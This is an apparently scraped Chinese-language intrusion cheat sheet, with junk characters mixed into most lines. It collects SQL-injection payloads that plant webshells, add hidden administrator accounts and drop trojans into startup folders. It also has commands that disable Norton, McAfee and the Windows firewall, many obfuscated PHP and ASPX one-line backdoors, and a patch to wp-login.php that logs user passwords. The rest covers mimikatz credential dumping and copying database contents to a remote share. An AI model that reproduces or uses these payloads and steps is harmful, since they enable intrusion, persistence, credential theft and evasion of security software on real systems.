5 E( S# _2 l2 d9 ?0 d( Ninsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
, }8 N0 s* `& x! f/ S @select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
1 k3 R2 u3 u8 T! Gdrop table a;5 X* ]/ ~6 p# w [! a! {
9 j5 c" G& R0 ~) R( G
英文版本:
$ r. v1 b4 j, ~! X3 F5 q( v7 Z7 x0 O: `+ i: `4 {4 {
use test;3 @. D& Z% d) q# C( f! L. l
create table a (cmd text);1 F5 }+ U. M: ]) e% {3 z: [
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
( g* C( _: D' s# G# l- h( ^4 e: Rinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );* u7 K+ K7 j: u6 K5 z c2 @4 R
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );6 O7 a# Y# m( K" }/ h, c
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
1 n- j. `) A! x% M: C0 ~. a8 X0 Odrop table a;" @, @6 R0 h# p* B
. x ~5 E2 I7 \" G- S! N5 r% F+ D
create table a (cmd BLOB); r3 g9 _* T6 ^
insert into a values (CONVERT(木马的16进制代码,CHAR));& r% N) |" n0 b# ?, |
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
/ f4 w6 X2 ~7 @: t9 rdrop table a;0 V' y4 h. \4 B) I5 A
, y- H# W5 C& L: p+ j2 w) q. F
记录一下怎么处理变态诺顿
, S/ G1 X. G C# }# z# k查看诺顿服务的路径
M3 X3 w2 P$ rsc qc ccSetMgr
8 j S" G7 F, ?; @% h: o然后设置权限拒绝访问。做绝一点。。 R3 t, w% `( t% j) w) ?. L
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system( ^' {( H' g! w5 A; q8 C7 M3 C' C- P
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
+ d; b' L6 U5 Q7 [0 K$ w8 Icacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
- G& y, J' L0 o% v$ ucacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone6 Z( `& G7 t) q- g: a' i% v! k% Y0 V: m
5 {, s) p, |: P! z! C9 N- v
然后再重启服务器
0 l% ^9 R }; K3 f! R1 l8 aiisreset /reboot0 J7 w: }% G, C
这样就搞定了。。不过完事后。记得恢复权限。。。。
7 x0 j+ \# ^' s- e2 O- {cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
7 M7 B0 @! G3 _. ccacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F9 _5 [- V. n, [" W8 A4 l
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
9 A- a" ?: [1 j) N3 r# Xcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
" w6 K9 u+ [! B% M# f8 GSELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
# }6 F* o& N7 @, s8 u2 H8 s
4 {+ \4 y) b, F$ i9 H7 x4 fEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user'''). Q) b& D4 B5 V; x
* `, [3 }) k/ z% r( G
postgresql注射的一些东西
8 S) Z" M/ e& I1 ` ]) M如何获得webshell
5 g6 @* H& v' B8 Y! chttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
$ A+ J7 Q' `( W' }0 ehttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); ; b. d* ]5 N% N* E2 }
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;) o- m$ L. c! T$ E1 n
如何读文件
+ O4 m/ @/ Y/ ]2 vhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
! }3 t( p. x' j/ @, @http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
" @9 X& a! C$ ]+ d$ G* ?5 `4 zhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;8 c8 d+ R0 `4 U2 _! ^; y- K
/ S+ h. c `* ]- D7 w0 Q. @: ~z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
5 e) ]& s0 g( b% }8 D, T: N当然,这些的postgresql的数据库版本必须大于8.X
3 Q9 ]8 }5 E" }$ e, `/ f5 O创建一个system的函数:- T9 Z* u( ~3 I# D
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
( A6 \; B& }+ d% g( b0 L7 h
4 ~4 X7 O5 U! h创建一个输出表:* ^% }& W6 d6 {' _- o) j% J. W% X
CREATE TABLE stdout(id serial, system_out text)( N) V7 L |) U- W
' |9 M0 I9 m, x% _5 l执行shell,输出到输出表内:3 k0 O( R4 @4 Z' S- [! Z* Y- ?
SELECT system('uname -a > /tmp/test')% K [) w5 i! _ j: V& M$ e' Z
7 ~ n2 S/ U1 t6 }. \1 h
copy 输出的内容到表里面;# u% n! u3 A, H9 O+ I
COPY stdout(system_out) FROM '/tmp/test'9 c g# O, ?& v% r) f
, f8 l+ V5 `# T' ~从输出表内读取执行后的回显,判断是否执行成功
; K, p7 C2 Y6 Y1 a2 \7 Q/ i, Y# s F9 M! V
SELECT system_out FROM stdout
( C4 ]5 I D/ ~% s* C8 N& f下面是测试例子9 i, y8 ^2 i/ r3 e. t+ _7 C
, G) T2 e; A- h5 }) P7 H( q/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- - S/ x; Y! z0 ]
: U- ~+ G- n6 t) L$ z j& I/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
' Y4 e/ E/ V$ P$ fSTRICT --: K4 E# K$ z+ r. c' f+ b0 r
5 J t* A& k" O" K! l/store.php?id=1; SELECT system('uname -a > /tmp/test') --
) ?/ ^, J T6 r3 ?: L# ]5 D
- {: L; I. k; S. }, O* J9 C2 W; Z/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
3 z) N( c; j5 p
( O, N, u& j! @/ P/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
( l9 ^! Q$ f. C: v" S- Anet stop sharedaccess stop the default firewall7 y% I% l5 f$ M1 r, S4 w( [" J
netsh firewall show show/config default firewall8 r- D6 g! I; G6 Z2 K6 h
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
: V2 ^6 f9 m# A O( x3 Lnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
& }7 w5 g% X7 c修改3389端口方法(修改后不易被扫出)2 V. R3 p( W" P
修改服务器端的端口设置,注册表有2个地方需要修改
8 n* P4 X; @1 V' i1 z* J5 M* {! v$ J6 `' y
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]0 @# ]$ s t* L! R( E: ?0 z
PortNumber值,默认是3389,修改成所希望的端口,比如6000* m# K2 }; l. s9 H4 a! s( @! [
; G, I+ k: z2 p0 h' ^
第二个地方:
w) ?; X: `" y+ ~[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
+ N* g% o- G. o( y2 R: nPortNumber值,默认是3389,修改成所希望的端口,比如6000
. [' i- j9 C. h% Q! Q
: f: P" q8 \- U. t, j现在这样就可以了。重启系统就可以了0 a7 B9 o7 S! `
/ Q/ u; T& ^7 n% p) W g t7 M
查看3389远程登录的脚本
9 N u- L2 H! J) o, L7 t保存为一个bat文件
! r5 S( w, C! B3 U# n4 ]date /t >>D:\sec\TSlog\ts.log8 {/ J) `7 k2 a Y
time /t >>D:\sec\TSlog\ts.log
$ x9 M$ o7 v; p4 ^/ s. D1 Xnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log! K! y* _. h4 P. I# ~9 H9 K6 h
start Explorer
5 Z, M2 Q4 o$ F. k- m
- G) t9 m p4 {: \4 Omstsc的参数:! v) n! [$ D, ~/ W8 z/ H! O6 {
/ ]* g/ |$ Z [$ N
远程桌面连接5 h7 V& t0 X, s5 _
& k' s. u' O- ^8 J2 G" t
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
; p6 X e- w" K [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?3 d8 O1 \1 M/ a/ \! E
& |8 O- g# N8 f7 H5 \6 B# g, t<Connection File> -- 指定连接的 .rdp 文件的名称。
6 d: W5 o" K1 I+ y( r4 x* {8 d( j5 q. H% {9 a5 w) M
/v:<server[:port]> -- 指定要连接到的终端服务器。
: C% P. A. J7 A' C5 a3 l6 Z- J* b! G
, } E5 t% s6 p9 u( {( ]/console -- 连接到服务器的控制台会话。6 d! p( D. I* Z J
5 m, V9 ]: r* L# G# z7 F- \; c1 C
/f -- 以全屏模式启动客户端。: d9 f m! ~+ B+ N
) w- F# `4 |1 i- g/ N' e/w:<width> -- 指定远程桌面屏幕的宽度。
# ]2 x f7 P' X& j' s9 G7 u2 J
/h:<height> -- 指定远程桌面屏幕的高度。( {2 ~0 i; H; N: h8 c
, g5 Q0 K- S' I7 ^9 z& J4 t/edit -- 打开指定的 .rdp 文件来编辑。4 u4 I# \1 N( A, R, X$ p
% m; m5 S$ ~6 x4 |; @: H* t9 E$ ~/migrate -- 将客户端连接管理器创建的旧版
0 ?2 d4 J* X* S% Z8 ^连接文件迁移到新的 .rdp 连接文件。
/ t/ l5 `1 m6 i% p/ z
6 K2 {) N% R/ F# W# G3 }+ U0 `+ f& L. h' x+ {, y
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
r9 Q- e; J" Y8 P0 `mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
" }9 Z8 n1 T: X7 O- r8 R. l; X6 Q
命令行下开启3389# \6 t) j+ _9 p+ X) N( t( c$ z) y
net user asp.net aspnet /add
& C7 K. h8 c8 Y! qnet localgroup Administrators asp.net /add
' z* W2 z# n$ T9 H/ }net localgroup "Remote Desktop Users" asp.net /add' }( v8 X6 p6 z( k
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
7 E& W/ U, O! k1 Q; y+ Q8 necho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
c* a/ @6 K7 o& W1 Iecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1% a4 R# Y) f) u' P( u6 k, t
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f' v. l6 Y7 o( ~
sc config rasman start= auto6 r7 i7 ^ L6 G5 w
sc config remoteaccess start= auto7 \" f1 W- d( d# b
net start rasman6 u5 ~0 O. _( q
net start remoteaccess& _) }( b$ a' v" s
Media9 b N$ T" z0 g+ ]. `7 J( N! t
<form id="frmUpload" enctype="multipart/form-data"& A; r Y3 o6 q) X2 ^. p3 u( k
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
; }& O: k. I9 G4 B' P<input type="file" name="NewFile" size="50"><br>
" V+ H* f4 n _) `$ q f' J<input id="btnUpload" type="submit" value="Upload">* z" f+ w4 H2 d2 u
</form>
/ B C4 y7 M$ A+ k \' Q
: s5 z+ y% C/ F1 \1 w* `% scontrol userpasswords2 查看用户的密码
# Z; U( \/ x- J) n6 naccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径' v2 l: f* j3 ?& Q5 F5 t
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a& o6 g& i8 N4 G' C$ d
0 L' D9 l6 D: T# U141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:; f: J/ o2 y8 ], e3 N
测试1:2 T2 B# v; ]+ C/ ]
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t17 j! I, R; `+ q' ]0 U0 q
7 p3 b9 \% Y4 S测试2:- G' M5 z, }( D1 n
O; _5 b6 H, q# z- D! d! Wcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
: [+ E/ o4 q/ V9 f3 J1 K8 y+ c' W+ B
6 H% Y& _7 t( I* {! C' Xdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--/ o$ H& o- Y' B, a% t4 v* `# L4 v
& V+ E, F# D& E6 N. p, o
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1$ p; n- Q2 c& s# K
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
0 C& }; y, h( g' a8 L# B$ G! H* F可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
. R, g: I1 `6 }2 x& x' K/ i, Wnet stop mcafeeframework( w! U! E6 c- R+ V# Z- v
net stop mcshield
1 x0 `2 p4 ~4 Y. E p" L' Onet stop mcafeeengineservice' _# V& s, V& f8 R* i @1 l
net stop mctaskmanager
7 b" O4 U& X, u2 K% thttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
$ v& d+ B# |& k8 s' ^6 o. K
$ \- ^* ^8 u6 ~7 B1 e VNCDump.zip (4.76 KB, 下载次数: 1)
- o" ^/ f% m z$ j( [/ C" O密码在线破解http://tools88.com/safe/vnc.php
; Z+ \- W) v/ c5 E! ?' UVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
4 S$ J5 g# T7 J3 N7 t4 b2 @7 m; D
, b5 x5 n$ t) uexec master..xp_cmdshell 'net user'. V! X0 K2 y; W6 M
mssql执行命令。 a( Q8 N! ]7 i; R0 U# i" F
获取mssql的密码hash查询
# s8 x0 _9 H! O/ X! Qselect name,password from master.dbo.sysxlogins) o. ~: v9 O0 ^4 J* c+ \
: ?3 `$ E2 E( @. J# N, Tbackup log dbName with NO_LOG;
0 s( `, N9 ?0 [: u7 z% e$ Z" X6 J% mbackup log dbName with TRUNCATE_ONLY;
& s; Y; B: z, O rDBCC SHRINKDATABASE(dbName);
, _% [* T% P( C( y/ G- h& Omssql数据库压缩7 q( K! q& ~& j3 Z* Q5 H
, ~# j" G6 @+ h! D: C" W" ERar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
0 w! R5 S/ `- g4 k将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
* i/ m8 A+ x6 O9 J" q
% Y7 m+ ~! o' p' D8 G, Jbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'8 O/ \2 B; d. j$ u* ^
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak4 p/ P/ |# F- n3 t% G/ g; ~( |3 a; `
: Z7 F0 e! v/ G$ |( U& jDiscuz!nt35渗透要点:
+ Q3 V6 l7 g8 A, Q! E8 R(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
- g, W! W6 ]2 @4 t. Q(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
1 P( ~0 e6 p' J0 v(3)保存。
( \5 K; z6 {4 [3 A; j3 Z# D(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
+ E) G j- I. {3 y8 _d:\rar.exe a -r d:\1.rar d:\website\
' V$ B) u& t; o {( | L递归压缩website) f+ u( `; s' N+ z4 l) s
注意rar.exe的路径
t s1 K" T) w. ]; F+ _) w) J* G- G0 j6 r5 {+ }0 z' y
<?php
. [3 v0 f! j6 [4 f; q( C# z, M: p# w! q+ w& v; ~' s
$telok = "0${@eval($_POST[xxoo])}";
# f6 x: q6 [' g2 k
& t+ Y* Q. u( z2 C$username = "123456";
3 E/ Q8 a' X$ @/ |$ h# y9 f
r7 O6 x, {" O# V' K# y$userpwd = "123456";
; Z+ S( K) @' A2 H9 H2 t% h/ v& ^+ B9 G( S; Y$ L5 A) H
$telhao = "123456";" l! f8 Y% v, A) _9 w K
Z+ M. ]3 ?8 d$telinfo = "123456";
+ U( h0 f1 ^1 j4 F# _) \% _$ i
* i: w) ^6 v$ `; |7 m. c$ Y9 b) C?>% L% i3 K5 ~& g1 E: N
php一句话未过滤插入一句话木马
% u) w; q4 y; I! \: X l
4 I5 H- V, v# H站库分离脱裤技巧
& c% V) _. F u' Z% E1 {exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'( S2 ~3 P) c4 C! f1 B* V
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'9 I( `0 z* T0 X8 R# V( p' T& _9 H# K
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。4 A; }8 I3 k2 N9 O! ~
这儿利用的是马儿的专家模式(自己写代码)。
! j' v9 V4 {8 x& M3 ^ini_set('display_errors', 1);0 f& ]6 Y* w& m d" X$ W; e
set_time_limit(0);7 L1 W$ H" h) S2 p* ~
error_reporting(E_ALL); e" A& |% v; B
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());. T- R, E+ s2 R8 I% z
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
. ?) [1 z, U8 N( e) O& a# |( `* m$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
% S/ G( n4 ? _( i) I$i = 0;% K. Z" K' D1 @# ^
$tmp = '';
) E6 o# A9 I) P4 g* vwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
) {% E) U [. ^+ E' {7 W $i = $i+1;8 _. F- `2 {% E6 H/ i: T3 C
$tmp .= implode("::", $row)."\n";
3 }5 P7 B1 [3 E if(!($i%500)){//500条写入一个文件1 d1 w) V' N2 G. e5 M+ M
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';, H3 J* Y) ?" l: l1 Q( R
file_put_contents($filename,$tmp);
1 K. L9 u2 p! g d7 Q2 P $tmp = '';
3 G4 F# I$ c- r M- }" b }
% r) e0 y( e/ [& i}
; }: D6 s# V5 T& W+ I9 V c. Emysql_free_result($result);
/ I( z! b- `- M8 F1 V) l6 G3 S
& }" Y# N; @' [9 D
% A( N, | I- v) \3 o7 _, J2 @; b//down完后delete
2 D, \/ |1 c; A; [4 q
+ {- @5 ~# ?. } ]: |, Y$ P6 F! X/ A4 t' J
ini_set('display_errors', 1);
. X% U9 j6 W! L8 V/ werror_reporting(E_ALL);
. x+ E: |) N1 ]. t# w$i = 0;
' C! I5 t& H8 n* j O& g: Xwhile($i<32) {& e0 z2 U& W$ Q5 S3 |) h" i
$i = $i+1;7 L5 z P) D* ~% O+ L
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
) ?" r6 w( B( v4 l) o unlink($filename); n N. R5 i% r" b5 _ ?* Y& P
} + D$ r* D, X8 m4 {1 N e
httprint 收集操作系统指纹- W" F; z- w- M m) k) G
扫描192.168.1.100的所有端口
9 W# S p# I9 m5 v% `1 @nmap –PN –sT –sV –p0-65535 192.168.1.100
) M, O0 l- T, r- ?$ ]) Nhost -t ns www.owasp.org 识别的名称服务器,获取dns信息
& T9 u& R4 g9 z; lhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输- E9 c" ?/ y2 a/ |' Z, ~, Z
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
0 W2 J! m( p4 n- A) i8 \6 {( a# ~+ w1 b6 [- \8 v, \) s1 X
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)- M! U2 [& [6 H. A* J R+ {3 j
! E2 C+ }; c$ z- ]2 \. A6 w MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)" ~* c" w, m& B# g* L9 o! G
3 K& B( [$ ^ x& i Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
n, U- W) c d8 e$ V1 |- P
* D& _- l- H6 i' T, s DNSstuff: http://www.dnsstuff.com/ (有多种服务可用) L2 U# E M C( U' q9 c
Y' |3 z- X b
http://net-square.com/msnpawn/index.shtml (要求安装), O- ^& c F, T5 h4 r) X! B0 M
4 I" E: C k% D' o0 P tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
/ @ @/ b) [ }2 a# x; f) R; X8 x1 v
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)! o, k8 Q, E9 `& n+ {( a: k2 x
set names gb2312$ Y) d; B. F% S u: M. A
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。+ V2 [. \5 [) C8 g, R
1 D& Q( }) z* u* }8 {7 Y
mysql 密码修改
x+ ?" r" y: F8 p$ y5 t0 gUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” . ^0 b2 C: g2 a _8 i& f9 C M
update user set password=PASSWORD('antian365.com') where user='root';& ^7 i5 N/ P. U; Y7 ^# g* [
flush privileges;
- x4 \- m$ ]: T8 A高级的PHP一句话木马后门7 B6 Y5 S& [/ G) n8 x
, p4 G: X5 a1 f6 M! O; Y
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
; y4 ?: t; ^8 t' u' l( d5 A) o+ |* m8 L5 v }8 j
1、
; x8 c/ p9 ]/ P0 N: y% {9 C, B& B8 z4 {5 T/ p5 i3 W+ e% `6 {
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
" L3 }- g; l. l" b$ j
3 N z* X, ~& l; h6 a( x/ V9 N$hh("/[discuz]/e",$_POST['h'],"Access"); s. x7 e Z/ a6 ^
* v' [1 F3 F1 i+ z% o$ r H1 p3 ?//菜刀一句话! W' g0 u6 |) E* s
9 O, M/ y$ e" o2、
& C% C- D+ L7 k' s; ^1 U
" C' \' K3 N9 K Q8 w$filename=$_GET['xbid'];
. P- v* }/ k& o/ B# ^8 J
, e% ^, ~' V. C Winclude ($filename);
7 S$ @) N$ h" } {; b) D7 q5 U0 e' D! m& \9 J6 x
//危险的include函数,直接编译任何文件为php格式运行! R. i* }0 D* k- R5 b
! }5 s3 u k' T3 F0 B
3、/ {+ ^3 n# u9 b% J3 K
$ E. |3 p( n' f( T1 X% H& o
$reg="c"."o"."p"."y";9 W9 M8 K) Y) @
+ P J f* h5 I# A! [
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);+ g8 c+ H: Q2 u4 B2 ^: D9 u
7 ~9 s0 r" j) E8 H- g//重命名任何文件) ~2 \# U- j! ^- h( v+ A
) D' |3 @; O% q) V7 w1 D* x4 ~4 u
4、7 R5 `) Y8 s3 q" z( g0 m$ M
# U! C+ q; P+ C1 w' O: l# C
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
6 l% Y# @: O- R( E' s* S7 p. ~: [6 [, B, Z9 V
$gzid("/[discuz]/e",$_POST['h'],"Access");
; G1 O! }: @1 Q7 G/ o( Z1 P/ ~' z3 A9 F2 X6 V- O4 F
//菜刀一句话. D0 o" v4 k6 f: Z* P
( w" E6 J7 F2 w4 ?1 q
5、include ($uid);% x: s* B) `) z- S( _3 o
/ R2 ^- k( R2 {# N9 r//危险的include函数,直接编译任何文件为php格式运行,POST 6 g8 a |- E/ |% m4 \
! g8 t9 O+ C' @4 y K1 {4 c6 m1 a& A6 }9 s! b
//gif插一句话* K5 q0 q; \! v+ ]; G! O
1 I/ u! H( H' w$ E( i6、典型一句话9 b+ ^0 m5 u7 \8 S/ i: g: J
# ~! P: m; m+ R
程序后门代码2 f& L3 n4 ?8 I4 i ^
<?php eval_r($_POST[sb])?>7 g L# k: S( _1 x5 C% x% {
程序代码1 n( L1 j2 J5 E( K; S4 J
<?php @eval_r($_POST[sb])?>
# q ^% M* \5 ~$ g5 Q* E//容错代码0 B& Z4 z6 q4 \# k6 a" c- [
程序代码
% t7 ]; z; O, {. w. |: K<?php assert($_POST[sb]);?>/ L5 [3 F0 U/ O, i* s
//使用lanker一句话客户端的专家模式执行相关的php语句3 y% E" {/ K# l+ ~& h+ }6 {2 L* C
程序代码4 @+ m/ p9 p1 T1 Y0 k
<?$_POST['sa']($_POST['sb']);?>
: h" ?: U* S, y6 U$ w$ I" d9 q' ]程序代码
% G t! q5 O" F9 p. r<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>- {: I) F6 N3 [+ Y6 r) r
程序代码# B. m" b- n: |6 P8 n
<?php
9 V( _3 r' }) O- s* }( E% A@preg_replace("/[email]/e",$_POST['h'],"error");* I# H4 Q c! O i" R
?>
5 q9 _: m3 I, g/ L. |: D//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
9 O6 r' a5 U, j4 Y5 s) n程序代码
/ Z4 v% [7 ?6 F2 W1 n% Z2 Q<O>h=@eval_r($_POST[c]);</O>* X( X! m, h+ ^$ o- {
程序代码! D2 o9 T4 W5 u7 S- F
<script language="php">@eval_r($_POST[sb])</script>% N* }4 f% ]4 _* M( Q& [
//绕过<?限制的一句话 u/ [8 S Y7 _, j" _
& s9 j [/ J. [% I2 u) A3 D, `5 {
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip5 ?2 [& |3 {5 `7 @8 ^$ Y8 h
详细用法:
7 [. U, J0 q$ T. g6 q" w% k1、到tools目录。psexec \\127.0.0.1 cmd
8 J/ X8 ?- U/ T+ g( v/ e2、执行mimikatz
7 }) R1 a, A- Y3 C7 F1 B3、执行 privilege::debug" q; E/ F( y) G- S
4、执行 inject::process lsass.exe sekurlsa.dll1 I+ @6 b6 X: v4 w* W
5、执行@getLogonPasswords
h- v- a4 `, F8 G$ _; n6、widget就是密码
* I: |" l3 Z( O& K' o4 M' w7、exit退出,不要直接关闭否则系统会崩溃。
+ N4 T- L& P6 T4 _: F- Z, n2 Z5 s9 w& W& w
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面) x0 Q, d/ d- K p
% M. U! V: f0 A. y自动查找系统高危补丁3 T& B: X, ]% V
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt3 F, Z! ^* g5 n3 _8 A7 w+ ?# [
9 \9 w0 u8 D4 @( L1 f1 X6 n
突破安全狗的一句话aspx后门
; s4 V, X( K; ?<%@ Page Language="C#" ValidateRequest="false" %>
' m( @; D$ x1 u- i3 V) j+ W# _% i7 T( f<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>+ ~2 F" u, u( L* m1 M1 R+ i
webshell下记录WordPress登陆密码
3 c: `8 X, |- K$ ?# P" Xwebshell下记录Wordpress登陆密码方便进一步社工8 c; A/ ~5 @/ D! ]7 D
在文件wp-login.php中539行处添加:8 k# U* P* a- I# q8 u
// log password% {, C; |2 O. Z
$log_user=$_POST['log'];
2 ]5 E& B% P2 z5 E- x4 a |$log_pwd=$_POST['pwd'];, F7 ^5 c% G$ n& Z
$log_ip=$_SERVER["REMOTE_ADDR"];
+ o$ \1 J/ h8 ?+ `( w- j$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
0 a: [, l* q$ K6 x1 S" J$txt=$txt.”\r\n”;
) [" |$ U8 a0 w# m# Lif($log_user&&$log_pwd&&$log_ip){
/ Q& }# t @3 j2 O8 }@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
) ? D0 |9 E9 S}
) h% P' U( e; E; F v1 T当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
# F7 e: i+ s$ b& {! K) f就是搜索case ‘login’4 \5 y* A! r9 { Y2 C8 X6 @; `! S
在它下面直接插入即可,记录的密码生成在pwd.txt中,! i6 h$ r. X& z) e% e' V& t
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
1 d" [" B; j0 [& c9 z8 E, e利用II6文件解析漏洞绕过安全狗代码: B0 t5 ~8 |5 f* _
;antian365.asp;antian365.jpg
3 D" u7 L$ p! H
1 s% ~2 [9 Y$ U各种类型数据库抓HASH破解最高权限密码!4 ]# x0 R7 O. C6 n; n
1.sql server2000
8 o9 v [; s; g6 y" a: dSELECT password from master.dbo.sysxlogins where name='sa'
7 @& o. k# w9 T: w2 j0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341 r2 l3 y" e& ?6 c; R' r
